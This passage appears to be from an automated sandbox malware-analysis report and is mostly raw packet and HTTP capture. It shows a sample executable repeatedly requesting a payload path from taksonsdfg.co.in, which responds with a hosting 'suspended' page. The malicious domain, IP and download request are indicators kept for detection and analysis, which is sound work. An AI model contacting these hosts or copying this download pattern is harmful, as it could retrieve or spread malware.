                                Nov 26, 2024 08:13:47.192990065 CET49982443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:47.193010092 CET44349982108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:47.193021059 CET49982443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:47.193027020 CET44349982108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:47.194051027 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:47.194077015 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:47.194139957 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:47.194339991 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:47.194351912 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:48.525803089 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:48.528389931 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:48.528414965 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:48.530100107 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:48.530108929 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.147883892 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.147943974 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.148025990 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.148046017 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.155217886 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.155292988 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.155424118 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.155441999 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.155462980 CET49987443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.155467987 CET44349987108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.379877090 CET49993443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.379937887 CET44349993108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.380069017 CET49993443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.380314112 CET49993443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.380362988 CET44349993108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.380429029 CET49993443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.454953909 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.455002069 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:49.455094099 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.455385923 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:49.455403090 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:50.843624115 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:50.843723059 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:50.845022917 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:50.845036983 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:50.845274925 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:50.846688986 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:50.891330004 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:51.351118088 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:51.351187944 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:51.351469994 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:51.380311966 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:51.380332947 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:51.380362034 CET49994443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:51.380368948 CET44349994108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:51.429090023 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:51.429138899 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:51.429222107 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:51.429584980 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:51.429600000 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:52.816236973 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:52.816807032 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:52.816831112 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:52.817667007 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:52.817678928 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.449579954 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.449630022 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.449875116 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.449902058 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.453331947 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.457474947 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.457525969 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.457555056 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.457572937 CET49998443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.457581043 CET44349998108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.682764053 CET50004443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.682813883 CET44350004108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.682905912 CET50004443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.684302092 CET50004443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.684350014 CET44350004108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.684556961 CET50004443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.810708046 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.810759068 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:53.810856104 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.811240911 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:53.811264038 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.446283102 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.446369886 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.447613001 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.447618961 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.447870970 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.448987007 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.491326094 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.956751108 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.956835985 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.956907034 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.957223892 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.957254887 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.957272053 CET50007443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.957281113 CET44350007108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.958154917 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.958194971 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:55.958308935 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.958496094 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:55.958508968 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.332164049 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.332730055 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:57.332775116 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.333954096 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:57.333962917 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.965142012 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.973453999 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.973633051 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:57.973655939 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.975693941 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.975791931 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:57.975922108 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:57.975940943 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:57.975966930 CET50012443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:57.975974083 CET44350012108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:58.243417025 CET50017443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.243484974 CET44350017108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:58.243597031 CET50017443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.243668079 CET50017443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.243757010 CET44350017108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:58.243817091 CET50017443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.335917950 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.335941076 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:58.336036921 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.336529970 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:58.336540937 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:59.711023092 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:59.711182117 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:59.712471008 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:59.712481022 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:59.712769032 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:13:59.714342117 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:13:59.759326935 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:00.212342978 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:00.212416887 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:00.212701082 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:00.212701082 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:00.214015961 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:00.214062929 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:00.214134932 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:00.214365959 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:00.214376926 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:00.215158939 CET50019443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:00.215183020 CET44350019108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:01.543664932 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:01.552217007 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:01.552253962 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:01.553949118 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:01.553972006 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.165978909 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.166047096 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.166110992 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.166147947 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.169971943 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.170031071 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.170075893 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.170095921 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.170110941 CET50024443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.170118093 CET44350024108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.383364916 CET50030443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.383426905 CET44350030108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.383536100 CET50030443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.383646965 CET50030443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.383694887 CET44350030108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.383766890 CET50030443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.468450069 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.468506098 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:02.468596935 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.468965054 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:02.468980074 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:03.797630072 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:03.797751904 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:03.799201012 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:03.799211025 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:03.799457073 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:03.802423000 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:03.847333908 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:04.290230989 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:04.290436029 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:04.290524006 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:04.290672064 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:04.290690899 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:04.290702105 CET50031443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:04.290709019 CET44350031108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:04.291734934 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:04.291815042 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:04.291882992 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:04.292125940 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:04.292141914 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:05.867647886 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:05.871190071 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:05.871207952 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:05.872185946 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:05.872194052 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.492949009 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.501097918 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.501211882 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.501233101 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.503469944 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.503535986 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.566339970 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.566359997 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.566373110 CET50033443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.566379070 CET44350033108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.793668032 CET50039443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.793705940 CET44350039108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.793817043 CET50039443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.953351974 CET50039443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:06.953423977 CET44350039108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:06.953768969 CET50039443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:07.086482048 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:07.086524010 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:07.086595058 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:07.087012053 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:07.087024927 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:08.508985996 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:08.509134054 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:08.510435104 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:08.510448933 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:08.510709047 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:08.512027979 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:08.555341005 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:09.020308018 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:09.020453930 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:09.020880938 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:09.030217886 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:09.030217886 CET50042443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:09.030236006 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:09.030247927 CET44350042108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:09.039098024 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:09.039143085 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:09.039213896 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:09.039397955 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:09.039408922 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:10.491144896 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:10.501708984 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:10.501738071 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:10.502840042 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:10.502846956 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.424153090 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.424217939 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.424304008 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.424340963 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.431642056 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.433979034 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.434046030 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.434065104 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.434075117 CET50046443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.434081078 CET44350046108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.644110918 CET50051443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.644171000 CET44350051108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.644262075 CET50051443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.646184921 CET50051443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.646228075 CET44350051108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.646584034 CET50051443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.658982038 CET50052443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.659022093 CET44350052108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:11.659092903 CET50052443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.659377098 CET50052443192.168.2.7108.170.55.202
                                Nov 26, 2024 08:14:11.659389973 CET44350052108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:13.037019968 CET44350052108.170.55.202192.168.2.7
                                Nov 26, 2024 08:14:13.037106037 CET50052443192.168.2.7108.170.55.202
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 26, 2024 08:12:09.141820908 CET5886853192.168.2.71.1.1.1
                                Nov 26, 2024 08:12:10.006603003 CET53588681.1.1.1192.168.2.7
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 26, 2024 08:12:09.141820908 CET192.168.2.71.1.1.10xf466Standard query (0)taksonsdfg.co.inA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 26, 2024 08:12:10.006603003 CET1.1.1.1192.168.2.70xf466No error (0)taksonsdfg.co.in108.170.55.202A (IP address)IN (0x0001)false
                                • taksonsdfg.co.in
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.749702108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:11 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:11 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:11 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:11 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.749708108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:13 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:14 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:13 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:14 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:14 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.749715108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:15 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:16 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:15 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
